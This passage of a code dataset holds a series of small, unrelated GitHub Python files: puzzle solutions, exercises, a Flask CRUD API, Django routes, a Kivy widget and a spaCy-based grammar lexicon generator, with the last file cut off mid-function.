+{"seq_id":"30038536769","text":"\"\"\"\nA Pythagorean triplet is a set of three natural numbers, a < b < c, \nfor which a^2 + b^2 = c^2\n\nFor example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.\n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\nFind the product abc.\n\"\"\"\n\nfrom math import sqrt\n\na = 1\nexit_status = 0 # for exiting while loop because I'm too stupid to figure out another way\n\nwhile a < 997:\n    if exit_status == 1:\n        break\n    for b in range(2, 998):\n        c = sqrt((a**2)+(b**2))\n        if c == (1000 - a - b):\n            triplet = [a, b, int(c)]\n            print(triplet[0] * triplet[1] * triplet[2]) # prints product from the 3 numbers in the triplet list\n            exit_status = 1\n            break\n    a += 1\n    \n\n","repo_name":"jakedmtr/project-euler","sub_path":"solved/problem-09.py","file_name":"problem-09.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"20476374809","text":"num = (input(\"Please enter a number: \"))\nwhile True:\n    try:\n        number = int(num)\n        break\n    except ValueError:\n        print(\"Input is not an integer number, try again\")\n        num = (input(\"Please enter a number: \"))\ndef VerifyPrimeNumber(number):\n    if number > 1:\n        for x in range(2, number):\n            if (number % x) == 0:\n                return False\n        else:\n            return True\n    else:\n        return False\nif (VerifyPrimeNumber(number)):\n    print (number, \"It's a prime number\")\nelse:\n    print (number, \"It's not a prime number\")\n","repo_name":"CS-UTEC/tarea1-github-Alexandra-SR","sub_path":"primo.py","file_name":"primo.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"42400563581","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\ndef inc(x):\r\n    def incx(y):\r\n        return x + y\r\n    return incx\r\n\r\ninc2 = inc(2)\r\ninc5 = inc(5)\r\n\r\ndef innc(x):\r\n    def innc2(y):\r\n        def innc3(z):\r\n            return x + y + z\r\n        return innc3\r\n    return innc2\r\n\r\nnum = 
[2,-5,9,7,-2,5,3,1,0,-3,8]\r\npositive_num = filter(lambda x:x>0,num)\r\n#average = reduce(lambda x,y:x+y,positive_num) / len(positive_num)\r\n\r\nimport numpy as np\r\nimport random\r\ndef rand10():\r\n while True:\r\n a1 = random.randint(1,7) - 1\r\n a2 = random.randint(1,7) - 1\r\n r = 7 * a1 + a2\r\n if r < 10:\r\n break\r\n return r + 1\r\n\r\nnums = []\r\nfor i in range(1000000):\r\n nums.append(rand10())\r\n\r\nfor i in range(10):\r\n print(nums.count(i+1) / len(nums))\r\n print('\\n') \r\n\r\n #Monte Carlo simulation\r\ndef circle():\r\n a = random.random() ** 2\r\n b = random.random() ** 2\r\n distance = a + b\r\n return distance ** 0.5\r\n\r\nimport time\r\nimport numpy as np\r\nimport random\r\nstart_points = time.time()\r\npoints = 0\r\nlength = 1000000000\r\nfor i in range(length):\r\n r = circle()\r\n if r < 1:\r\n if i % 1000000 == 0:\r\n print(i)\r\n points += 1\r\ncalc_pi = points * 4 / length\r\nend_points = time.time()\r\ninterval = end_points - start_points \r\nprint(calc_pi)\r\nprint(interval)","repo_name":"condoleezza/test20190321","sub_path":"justolay.py","file_name":"justolay.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28049553332","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nimport os\nfrom flask import Flask, request, abort, jsonify\nfrom flask import render_template, session, url_for, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_moment import Moment\n#from config import Config\nimport random\nfrom flask_cors import CORS, cross_origin\nfrom flask_migrate import Migrate\nfrom models import setup_db, Venue, Place, db\nfrom auth import AuthError, requires_auth\n\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n moment = Moment(app)\n db = SQLAlchemy(app)\n migrate = Migrate(app, db)\n #SECRET_KEY = os.urandom(32)\n CORS(app, resources={r\"/api/\": {\"origins\": \"*\"}})\n \n setup_db(app)\n\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH, POST, DELETE, OPTIONS')\n return response\n\n @app.route('/venues')\n @requires_auth('get:venues')\n def get_venues():\n venues = Venue.query.all()\n venues = [venue.format() for venue in venues]\n for venue in venues:\n venue['places'] = [i.format() for i in venue['places']]\n return jsonify(venues)\n\n @app.route('/places', methods=['GET'])\n @requires_auth('get:places')\n def get_places():\n places = Place.query.all()\n places = [place.format() for place in places]\n return jsonify(places)\n\n @app.route('/venues/create', methods=['POST'])\n @requires_auth('post:venue')\n def post_new_venue():\n body = request.get_json()\n vname = body.get('vname', None)\n description = body.get('description', None)\n venue = Venue(vname=vname, description=description)\n venue.insert()\n new_venue = Venue.query.get(venue.id)\n new_venue = new_venue.format()\n return jsonify({\n 'success': True,\n 'created': venue.id,\n 'new_venue': new_venue\n })\n\n @app.route('/places/create', 
methods=['POST'])\n @requires_auth('post:place')\n def post_new_place():\n body = request.get_json()\n pname = body.get('pname', None)\n pdescription = body.get('pdescription', None)\n venue_id = body.get('venue_id', None)\n place = Place(pname=pname, pdescription=pdescription,\n venue_id=venue_id)\n place.insert()\n new_place = Place.query.get(place.id)\n new_place = new_place.format()\n return jsonify({\n 'success': True,\n 'created': place.id,\n 'new_place': new_place\n })\n\n @app.route('/venues/delete/', methods=['DELETE'])\n @requires_auth('delete:venue')\n def delete_venue(venue_id):\n Venue.query.filter(Venue.id == venue_id).delete()\n db.session.commit()\n db.session.close()\n return jsonify({\n \"success\": True,\n \"message\": \"Deleted venue\"\n })\n\n @app.route('/places/delete/', methods=['DELETE'])\n @requires_auth('delete:place')\n def delete_place(place_id):\n Place.query.filter(Place.id == place_id).delete()\n db.session.commit()\n db.session.close()\n return jsonify({\n \"success\": True,\n \"message\": \"Deleted place\"\n })\n\n @app.route('/places/patch/', methods=['PATCH'])\n @requires_auth('patch:places')\n def patch_place(place_id):\n place = Place.query.filter(Place.id == place_id)\n body = request.get_json()\n pname = body.get('pname', None)\n pdescription = body.get('pdescription', None)\n venue_id = body.get('venue_id', None)\n place.pname = pname\n place.pdescription = pdescription\n place.venue_id = venue_id\n place.update()\n return jsonify({\n \"success\": True,\n \"message\": \"Place update occured\"\n })\n\n @app.route('/venues/patch/')\n @requires_auth('patch:venues')\n def patch_venue(venue_id):\n venue = Venue.query.filter(Venue.id == venue_id)\n body = request.get_json()\n vname = body.get('vname', None)\n description = body.get('description', None)\n venue.vname = vname\n venue.description = description\n venue.update()\n return jsonify({\n \"success\": True,\n \"message\": \"Venue update occured\"\n })\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': 'Not Found'\n }), 404\n\n @app.errorhandler(422)\n def unprocessable_entity(error):\n return jsonify({\n 'success': False,\n 'error': 422,\n 'message': 'Unprocessable Entity'\n })\n return app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8080, debug=True)\n","repo_name":"Keerthanamunna/Capstoneproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74144620578","text":"import sys\nimport os\nimport argparse\n\nsys.path.append(os.path.dirname(__file__))\nimport log\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-v\", action=\"append_const\",\n dest=\"verbose\", const=True, default=[],\n help=\"Verbose, specify twice for more verbosity\")\nconfig = parser.parse_args()\nconfig.verbose = len(config.verbose)\nconfig.verbose = config.verbose if config.verbose <=2 else 2\n\n# Set debug level early to catch package initialization outputs\nif config.verbose >= 1:\n log.Logger().add_level(log.DEBUG)\nif config.verbose >= 2:\n log.Logger().add_level(log.DEBUG2)\n\nimport chromesthesia\n\nfrom ._version import get_versions\n__version__ = get_versions()['version']\ndel 
get_versions\n","repo_name":"fredriklindberg/chromesthesia","sub_path":"chromesthesia_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"29289032791","text":"class Solution:\n def shortestCompletingWord(self, licensePlate, words):\n \"\"\"\n :type licensePlate: str\n :type words: List[str]\n :rtype: str\n \"\"\"\n from collections import Counter\n import re\n plate = Counter(re.findall(r'[a-z]', licensePlate.lower()))\n best = None\n for word in words:\n wc = Counter(re.findall(r'[a-z]', word.lower()))\n for k in plate:\n if plate[k] > wc.get(k, 0):\n break\n else:\n if best is None or len(best) > len(word):\n best = word\n return best\n\n\nfn = Solution().shortestCompletingWord\n\nprint(fn(licensePlate=\"1s3 PSt\", words=[\"step\", \"steps\", \"stripe\", \"stepple\"]))\nprint(fn(licensePlate=\"1s3 456\", words=[\"looks\", \"pest\", \"stew\", \"show\"]))\n","repo_name":"feigaoxyz/leetcode","sub_path":"p748_shortest_completing_word.py","file_name":"p748_shortest_completing_word.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"86582492595","text":"from django.conf.urls import url\r\n\r\nfrom api.views import news\r\nfrom api.views import auth\r\nfrom api.views import task\r\nfrom api.views import auction\r\nurlpatterns = [\r\n url(r'^message/', auth.MessageView.as_view()),\r\n url(r'^login/', auth.LoginView.as_view()),\r\n\r\n\r\n url(r'^topic/$', news.TopicView.as_view()),\r\n url(r'^news/$', news.NewsView.as_view()),\r\n url(r'^news/(?P\\d+)/$', news.NewsDetailView.as_view()),\r\n url(r'^comment/$', news.CommentView.as_view()),\r\n url(r'^favor/$', news.FavorView.as_view()),\r\n\r\n # celery示例\r\n url(r'^create/task/$', task.create_task),\r\n url(r'^get/result/$', task.get_result),\r\n\r\n # 专场列表\r\n url(r'^auction/$', auction.AuctionView.as_view()),\r\n url(r'^auction/(?P\\d+)/$', auction.AuctionDetailView.as_view()),\r\n url(r'^auction/item/(?P\\d+)/$', auction.AuctionItemDetailView.as_view()),\r\n\r\n url(r'^auction/deposit/(?P\\d+)/$', auction.AuctionDepositView.as_view()),\r\n\r\n url(r'^bid/$', auction.BidView.as_view()),\r\n\r\n\r\n url(r'^auction2/$', auction.Auction2View.as_view({'get':'list'})),\r\n url(r'^auction2/(?P\\d+)/$', auction.Auction2View.as_view({'get':'retrieve'})),\r\n]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"chengkanghua/python-note","sub_path":"选修进阶/微信小程序/day10/代码和笔记/demos/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"34"} +{"seq_id":"1346278544","text":"# import tryy\n# from turtle import Turtle,Screen\n#\n# timmy = Turtle()\n# timmy.shape(\"turtle\")\n# timmy.color('coral')\n# timmy.fd(100)\n#\n# my_screen = Screen()\n# my_screen.exitonclick()\n\nfrom prettytable import PrettyTable\n\ntable = PrettyTable()\n\ntable.field_names = [\"Pokemon\", \"Type\"]\ntable.add_row(['Pikachu', 'Electric'])\ntable.add_row(['Raichu', 'Electric'])\ntable.add_row(['Bulbasar', 'Land'])\n\ntable.align = 'l'\n\nprint(table)\n","repo_name":"BinayT/Python100DOC","sub_path":"Day-16-OOP/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} 
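The per-letter loop in `shortestCompletingWord` above can be collapsed with `Counter` subtraction, which keeps only positive counts, so an empty difference means the word covers every required letter. A minimal equivalent sketch (my rewrite, not the author's code):

from collections import Counter

def completes(plate_counts, word):
    # Counter difference drops non-positive entries; an empty result means the
    # word has at least as many of each letter as the plate requires
    return not (plate_counts - Counter(word.lower()))

plate = Counter(c for c in "1s3 PSt".lower() if c.isalpha())
words = ["step", "steps", "stripe", "stepple"]
print(min((w for w in words if completes(plate, w)), key=len))  # -> steps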
+{"seq_id":"36756766043","text":"from utils import kivy_utils # call builder for below classes\nfrom kivy.properties import ObjectProperty, NumericProperty, ListProperty\nfrom kivy.uix.image import AsyncImage\nfrom .line_box import LineBox\nimport cv2\n\n\nclass ImPage(AsyncImage):\n\ton_double_click= []\n\n\tpage = ObjectProperty()\n\tline_box_color= ListProperty()\n\tline_width= NumericProperty()\n\tfocus_box_color= ListProperty()\n\tfade_time= NumericProperty()\n\tfade_cycles= NumericProperty(1)\n\n\tdef build(self, page, im_path, page_index):\n\t\tim = cv2.imread(im_path)\n\t\tLineBox.LINE_WIDTH= self.line_width # janky but kvlang doesnt support rules for instructions\n\n\t\tself.source=im_path\n\t\tself.size=tuple(reversed(im.shape[:2]))\n\t\tself.bind(texture= self._disable_interplotation) # Prevent blurring\n\n\t\tself.page= page\n\n\t\treturn self\n\n\tdef load_boxes(self, hidden=True):\n\t\tself.boxes= []\n\n\t\tfor bubb in self.page.bubbles:\n\t\t\tbox,lbl= LineBox(color=self.line_box_color).build(self, bubble=bubb, hidden=hidden)\n\t\t\tself.canvas.after.add(box)\n\t\t\tself.boxes.append(box)\n\t\t\tself.add_widget(lbl)\n\t\treturn self\n\n\t# click events\n\tdef on_touch_down(self, touch):\n\t\tif touch.button == \"left\" and touch.is_double_tap:\n\t\t\tfor b in self.boxes:\n\t\t\t\tx_bnds= [b.pos[0], b.pos[0]+b.size[0]]\n\t\t\t\ty_bnds= [b.pos[1], b.pos[1]+b.size[1]]\n\t\t\t\tx_bnds.sort(), y_bnds.sort()\n\n\t\t\t\tif x_bnds[0] <= touch.pos[0] <= x_bnds[1] \\\n\t\t\t\t\tand y_bnds[0] <= touch.pos[1] <= y_bnds[1]:\n\t\t\t\t\tfor func in ImPage.on_double_click: func(b)\n\n\t\treturn super().on_touch_down(touch)\n\n\t@classmethod\n\tdef _disable_interplotation(cls, image, texture):\n\t\tif not texture: return\n\t\timage.texture.min_filter = 'nearest'\n\t\timage.texture.mag_filter = 'nearest'","repo_name":"LiteralGenie/TranslationThingy","sub_path":"classes/im_page.py","file_name":"im_page.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22066154143","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef show_samples_v0(samples_array, colors_array):\n for samples, colors in zip(samples_array, colors_array):\n plt.scatter(samples[0, :], samples[1, :], color=colors)\n\n\ndef concatenate_samples(samples_array):\n result = samples_array[0]\n for i in range(1, len(samples_array)):\n result = np.concatenate((result, samples_array[i]), axis=1)\n return result\n\n\ndef get_classification_error_from_class_nums(y_pred, y_test):\n\n N0 = np.sum(y_test == 0)\n N1 = np.sum(y_test == 1)\n p0_count = 0\n p1_count = 0\n y_pred = np.ravel(y_pred)\n\n for test_class_num, pred_class_num in zip(y_test, y_pred):\n\n if [test_class_num, pred_class_num] == [0, 1]:\n p0_count += 1\n\n if [test_class_num, pred_class_num] == [1, 0]:\n p1_count += 1\n\n return p0_count / N0, p1_count / N1\n\n\ndef get_euclid_dist(x, y):\n x = x.reshape(2, )\n y = y.reshape(2, )\n return np.linalg.norm(x - y)\n\n\ndef get_sum_distance(distances_array):\n distance = 0\n for distances in distances_array:\n distance += sum(distances)\n return distance\n\n\ndef show_vector_points(X, color='red'):\n for x in X:\n plt.scatter(x[0], x[1], color=color)\n\n\ndef show_vector_points_v1(X, color='red'):\n plt.scatter(X[0, :], X[1, :], color=color)\n\n\ndef get_s(samples, min_indexes, K):\n classes = [[] for _ in range(K)]\n for i, cls in np.ndenumerate(min_indexes):\n classes[cls].append(samples[0:2, i])\n\n for 
k in range(K):\n classes[k] = np.array(classes[k])\n\n return classes\n\n\ndef merge_classes(samples_set):\n result = samples_set[0]\n for i in range(1, len(samples_set)):\n result = np.concatenate((result, samples_set[i]), axis=1)\n return result\n","repo_name":"SobolevD/mro1","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6853187229","text":"import spacy\nimport re\nimport itertools\nimport functools\nimport sys\nfrom collections import defaultdict\n\nnlp = spacy.load(\"en_core_web_sm\")\n\nposDict = defaultdict(lambda: \"NOT FOUND\")\nposDict[\"NOUN\"] = \"N\"\nposDict[\"VERB\"] = \"V\"\nposDict[\"ADJ\"] = \"A\"\nposDict[\"ADV\"] = \"Adv\"\n# posDict[\"DET\"] = \"Det\"\n# posDict[\"PRON\"] = \"Pron\"\nposDict[\"CCONJ\"] = \"Conj\"\nposDict[\"SCONJ\"] = \"Subj\"\nposDict[\"PUNCT\"] = \"PN\"\nposDict[\"ADP\"] = \"Prep\"\nposDict[\"PROPN\"] = \"PN\"\n\ndef allowed_pos(pos):\n return posDict[pos] not in [\"NOT FOUND\"]\n\nillegal = '!\"#$%&\\'()*+, -./:;<=>?@[\\]^`{|}~\\\\§–'\nillegal_ = '!\"#$%&\\'()*+, -./:;<=>?@[\\]^`{|}~\\\\§–_'\n\ndef get_words(line):\n def replace_var(str):\n if str[:2] == '@(':\n return \"it\"\n else:\n return str\n\n return \" \".join([replace_var(w) for w in line.split()])\n\ndef removeIllegal(str):\n return ''.join([l for l in str if l not in illegal])\n\ndef mkConstructor(pos, linlem):\n if pos in ['A', 'V', 'N', 'PN', 'Prep', 'Conj', 'Adv', 'Subj']:\n return 'mk%s \"%s\"' % (pos, linlem)\n else:\n inner = '(mk%s \"%s\")' % (pos[0], linlem)\n return 'mk%s %s' % (pos, inner)\n\n\ndef getBasic(t):\n lemmas = [t.lemma_]\n return getAny(lemmas, posDict[t.pos_])\n\ndef getAny(lemmas, pos, prep0=None):\n linlem = ' '.join(lemmas) # if compound\n if linlem == '\"':\n return None # TODO: why is this even getting this far?\n funlem = '_'.join([removeIllegal(l) for l in lemmas])\n if prep0:\n prep = '(mkPrep \"%s\")' % (prep0)\n fun = '_%s_%s_%s' % (funlem, removeIllegal(prep0), pos)\n # inner = 'mk%s \"%s\"' % (pos[0], linlem) # first character of POS = intransitive\n # lin = 'lin %s = mk%s (%s) %s' % (fun, pos, inner, prep)\n else:\n prep = ''\n fun = '_%s_%s' % (funlem, pos)\n\n lin = 'lin %s = %s %s' % (fun, mkConstructor(pos, linlem), prep)\n # Result is the pos, fun and lin\n # but in a list, because in case of PN, we try alternative version\n result = [(pos, fun, lin)]\n if pos=='PN':\n alternative = getAny(lemmas, \"N\")\n return result+alternative\n else:\n return result\n\ndef getVerb(t, pos, prep0='because'):\n lemmas = [t.lemma_]\n if prep0 == 'because':\n return getAny(lemmas,pos)\n else:\n return getAny(lemmas, pos, prep0)\n\ndef getCmpnd(t1, t2):\n lemmas = [t1.lemma_, t2.lemma_]\n return getAny(lemmas, posDict[t2.pos_])\n\ndef checkSubChild(dep, ls):\n return any(child[2] == dep for child in ls)\n\ndef checkSubChildTwo(dep1, dep2, ls):\n return all(any(child[2] == dep for child in ls) for dep in [dep1, dep2])\n\ndef getSubChild(dep, ls):\n return [child[0] for child in ls if child[2] == dep]\n\ndef checkWhichVerb(t):\n childList = [[child.lemma_, child.pos_, child.dep_] for child in t.children]\n if t.lemma_ == \"be\":\n return []\n elif checkSubChildTwo(\"xcomp\", \"obj\", childList):\n# print(t.lemma_, childList)\n for child in childList:\n if child[1] == \"ADJ\" and child[2] == \"xcomp\":\n return (getVerb(t, \"V2A\"))\n elif child[1] == \"VERB\" and child[2] == \"xcomp\":\n return (getVerb(t, 
\"V2V\"))\n elif checkSubChild(\"prep\", childList):\n prep = getSubChild(\"prep\", childList)[0]\n return (getVerb(t, \"V2\", prep))\n\n elif checkSubChildTwo(\"ccomp\", \"obj\", childList):\n return (wogetVerb(t, \"V2S\"))\n elif checkSubChild(\"dobj\", childList):\n if checkSubChild(\"iobj\", childList):\n return (getVerb(t, \"V3\"))\n else:\n return (getVerb(t, \"V2\"))\n # also for adjectival complement\n # https://universaldependencies.org/fi/dep/xcomp.html\n elif checkSubChild(\"xcomp\", childList):\n for child in childList:\n if child[1] == \"ADJ\":\n return (getVerb(t, \"VA\"))\n elif child[1] == \"VERB\":\n return (getVerb(t, \"VV\"))\n elif checkSubChild(\"ccomp\", childList):\n return (getVerb(t, \"VS\"))\n else:\n print(\"*** VERB HAS CHILD BUT NOT LISTED\", t, \" :\", t.lemma_, t.pos_, t.morph, childList)\n return (getBasic(t))\n\ndef hasChild(t):\n return any(True for _ in t.children)\n\ndef get_toks(line):\n txt = get_words(line)\n doc = nlp(txt)\n\n words = []\n tok = enumerate(doc)\n\n for i, t in tok:\n if allowed_pos(t.pos_):\n #print(t, \" :\", t.lemma_, t.pos_, t.morph, t.dep_)\n if t.pos_ == \"VERB\" and hasChild(t):\n words += checkWhichVerb(t)\n elif t.dep_ == \"compound\":\n t2 = doc[i + 1]\n if allowed_pos(posDict[t2.pos_]):\n words += getCmpnd(doc[i], doc[i + 1])\n next(tok)\n else:\n pass\n elif t.lemma_ == \"-\":\n if allowed_pos(doc[i + 1]):\n words += getCmpnd(doc[i-1], doc[i + 1])\n next(tok)\n else:\n pass\n elif all([l in illegal_ for l in t.lemma_]):\n print(\"Word is illegal\", t)\n pass\n else:\n #print(\"word :\", getBasic(doc[i]))\n words += getBasic(t)\n else:\n print(\"ignored\", t, \":\", t.lemma_, t.pos_)\n pass\n return [w for w in words if w]\n\ndef absheader(name):\n return \"abstract %s = Cat [A, N, CN, V, VV, V2, VS, V2S, VA, V2A, PN, AdA, Adv, Prep, Pron, Conj, Subj] ** {\\n fun\\n\" % (name)\n\ndef cncheader(name, cnc):\n header = [\n \"concrete %s%s of %s = Cat%s [A, N, CN, V, VV, V2, VS, V2S, VA, V2A, PN, AdA, Adv, Prep, Pron, Conj, Subj] ** \" % (name, cnc, name, cnc)\n , \" open Paradigms%s, Prelude in {\" % (cnc)\n , \"\"\n , \"oper mkSubj : Str -> Subj = \\s -> lin Subj (ss s) ;\"\n ]\n return \"\\n\".join(header)\n\nif __name__ == \"__main__\":\n\n absname = sys.argv[1]\n cncname = \"Eng\"\n absfile = absname + \".gf\"\n cncfile = absname + cncname + \".gf\"\n corpus = sys.argv[2]\n\n with open(corpus, \"r\") as corpusfile:\n corpus = corpusfile.read().split(\"\\n\")\n\n words = []\n for line in corpus:\n words += get_toks(line)\n\n with open(absfile, \"w\") as abstract:\n with open(cncfile, \"w\") as concrete:\n abstract.write(absheader(absname))\n concrete.write(cncheader(absname, cncname))\n for pos, fun, lin in set(words):\n abstract.write(\" %s : %s ;\\n\" % (fun, pos))\n concrete.write(\" %s ;\\n\" % (lin))\n abstract.write(\"}\")\n concrete.write(\"}\")\n print(\"Created %s and %s\" % (absfile, cncfile))","repo_name":"smucclaw/sandbox","sub_path":"inari/scasp/lex.py","file_name":"lex.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"40410062987","text":"\"\"\"\nTried to do it in recursion but it is very slow compare to solution one and\ntwo. 
Thought from leetcode discussion\n\"\"\"\n\n\nclass Solution:\n    def valid_palindrome(self, s: str) -> bool:\n        return self.is_palindrome(0, len(s) - 1, s, True)\n\n    def is_palindrome(self, i, r, s, skip):\n        # stop when i is greater than or equal to r\n        if i >= r:\n            return True\n\n        # if left character is equal to right character, go to the next\n        # characters\n        if s[i] == s[r]:\n            return self.is_palindrome(i + 1, r - 1, s, skip)\n        elif not skip:\n            # if the characters are not the same, and we have already skipped\n            # a character, return false\n            return False\n        else:\n            # if the characters are not the same, but we haven't skipped a\n            # character, try to skip the left character or the right character\n            return self.is_palindrome(i + 1, r, s, False) or self.is_palindrome(\n                i,\n                r - 1,\n                s,\n                False,\n            )\n","repo_name":"asxzhy/Leetcode","sub_path":"leetcode/question_680/solution_3.py","file_name":"solution_3.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"12818437171","text":"# Question: Complete the script so that it removes duplicate items from list a .\n#\n# a = [\"1\", 1, \"1\", 2] -- \"1\" is a duplicate here\n# Expected output:\n#\n# ['1', 2, 1]\n\n# ********************Different Approach***********************\n\n# a = [\"1\",1,\"1\",2]\n# b = []\n# for i in a:\n#     if i not in b:\n#         b.append(i)\n# print(list(set(a)))\n\n# ********************Different Approach***********************\n\nfrom collections import OrderedDict\na = [\"1\", 1, \"1\", 2]\na = list(OrderedDict.fromkeys(a))\nprint(a)\n\n\n","repo_name":"SagarikaNagpal/Python-Practice","sub_path":"QuesOnOops/Removing_Duplicates.py","file_name":"Removing_Duplicates.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"7990495023","text":"def str_reverse(string):\n\tresult = ''\n\tfor ch in reversed(string):\n\t\tresult += ch\n\n\treturn result\n\nprint(\"=== Test str_reverse function ===\")\nprint(str_reverse(\"Anton\"))\n\ndef join(delimiter, items):\n\tresult = \"\"\n\tfor index, item in enumerate(items):\n\t\tif index > 0:\n\t\t\tresult += delimiter\n\t\tresult += item\n\n\treturn result\nprint(\"=== Test join function ===\")\nprint(join(\" \", [\"Radoslav\", \"Yordanov\", \"Georgiev\"]))\nprint(join(\"\\n\", [\"line1\", \"line2\"]))\n\ndef startswith(search, string):\n\tfor i in range(0, len(search)):\n\t\tif search[i] != string[i]:\n\t\t\treturn False\n\treturn True\n\nprint(\"=== Test startswith function ===\")\nprint(startswith(\"Py\", \"Python\"))\nprint(startswith(\"py\", \"Python\"))\nprint(startswith(\"baba\", \"asdbaba\"))\n\ndef endswith(search, string):\n\tstart = len(string) - len(search)\n\tfor i in range(start, len(string)):\n\t\tif search[i - start] != string[i]:\n\t\t\treturn False\n\treturn True\n\nprint(\"=== Test endswith function ===\")\nprint(endswith(\".py\", \"hello.py\"))\nprint(endswith(\"kapak\", \"babakapak\"))\nprint(endswith(\" \", \"Python \"))\nprint(endswith(\"py\", \"python\"))\n\ndef trim(string):\n\tresult = \"\"\n\tinline = False\n\tif string[0] != \" \":\n\t\tinline = True\n\n\tfor ch in range(0, len(string) - 1):\n\t\tif inline:\n\t\t\tif string[ch] != \" \":\n\t\t\t\tresult += string[ch]\n\t\t\telif string[ch] == \" \" and string[ch + 1] != \" \":\n\t\t\t\tresult += string[ch]\n\t\telse:\n\t\t\tif string[ch] != \" \":\n\t\t\t\tresult += string[ch]\n\t\t\t\tinline = True\n\tif string[len(string) - 1] != \" \":\n\t\tresult += 
string[len(string) - 1]\n\treturn result\n\nprint(\"=== Test trim function ===\")\nprint(trim(\" asda \"))\nprint(trim(\" spacious \"))\nprint(trim(\"no here but yes at end \"))\nprint(trim(\" \"))\nprint(trim(\"python\"))","repo_name":"adutev/Programming-0","sub_path":"week6/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"37001480595","text":"def main():\n N = int(input())\n nums = {}\n for _ in range(N):\n n = int(input())\n try:\n nums[n] += 1\n except KeyError:\n nums[n] = 1\n print(max(nums.values()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TopGun1405/BaekJoonOJ-Python","sub_path":"BOJ_N-9500-9999/BOJ_N-9913.py","file_name":"BOJ_N-9913.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71221186659","text":"from itertools import count\n\nif __name__ == \"__main__\":\n\n with open(\"input.txt\") as fh:\n splits = fh.read().strip().split()\n x_range = splits[2].split(\"=\")[1][:-1]\n y_range = splits[3].split(\"=\")[1]\n min_x, max_x = (int(n) for n in x_range.split(\"..\"))\n min_y, max_y = (int(n) for n in y_range.split(\"..\"))\n\n best, count = 0, 0\n for tx in range(0, max_x+1):\n for ty in range(min_y, -min_y):\n x, y, h = 0, 0, 0\n vx, vy = tx, ty\n while y > min_y:\n x, y, h = x + vx, y + vy, max(h, y)\n vx, vy = max(0, vx-1), vy - 1\n if min_x <= x <= max_x and min_y <= y <= max_y:\n count += 1\n best = max(best, h)\n break\n\n print(\"Part 1: %d\" % best)\n print(\"Part 2: %d\" % count)\n\n","repo_name":"LiquidityC/aoc","sub_path":"2021/day_17/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43184327229","text":"\"\"\"Game. 
Find the greatest common divisor.\"\"\"\nfrom random import randint\n\nfrom brain_games.scripts import brain_core as sc\n\nSTART_RANGE = 1\nEND_RANGE = 100\n\n\ndef calculation(num_a, num_b):\n    \"\"\"Find the greatest common divisor of given numbers.\n\n    Args:\n        num_a: First number.\n        num_b: Second number.\n\n    Returns:\n        Greatest common divisor of given numbers.\n    \"\"\"\n    if num_a == 0 or num_b == 0:\n        return max(num_a, num_b)\n    elif num_a >= num_b:\n        return calculation(num_a % num_b, num_b)\n    elif num_b >= num_a:\n        return calculation(num_a, num_b % num_a)\n
